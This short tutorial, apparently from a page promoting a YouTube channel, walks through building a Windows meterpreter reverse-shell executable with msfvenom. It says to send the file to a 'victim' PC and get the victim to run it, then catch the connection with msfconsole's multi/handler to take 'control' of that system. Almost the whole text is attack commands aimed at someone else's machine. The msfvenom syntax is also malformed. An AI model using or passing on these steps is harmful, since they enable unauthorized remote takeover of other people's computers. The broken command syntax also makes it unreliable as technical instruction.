Introduction: Step 1: Create a Payload

About: Check My YouTube Channel -https://www.youtube.com/channel/UC5e6SI1PxplxDx_A_IzjpDg

we need to create a payload for windows.

Open terminal

and Type

msfvenom -p windows/meterpreter/reverse_tcp=(HERE TYPE YOUR IP) lport=(TYPE ANY LOCAL PORT) - f (TYPE ANY FORMAT FILE like for windows .exe) -a x86 > (FILES FILES).exe

AND This file is in your root folder.

and you need to send this file in your victim pc

NOTE: this is need to run your victim

Step 1: Hacking IS START

Open terminal and type;

msfconsole

It will a minute.

TYPE; use exploit/multi/handler

Type
set payload windows/meterpreter/reverse_tcp

And we need to set your local host

TYPE; set lhost (your ip address)

TYPE; set lport (HERE)

TYPE; exploit

AND NOW YOUR VICTIM SYSTEM IN YOUR CONTROL

TYPE; HELP

For see commands

THANKS if you like this so, Please Share and follow me.

NEVER FORGET TO SUBSCRIBE ME

https://www.youtube.com/channel/UC5e6SI1PxplxDx_A_IzjpDg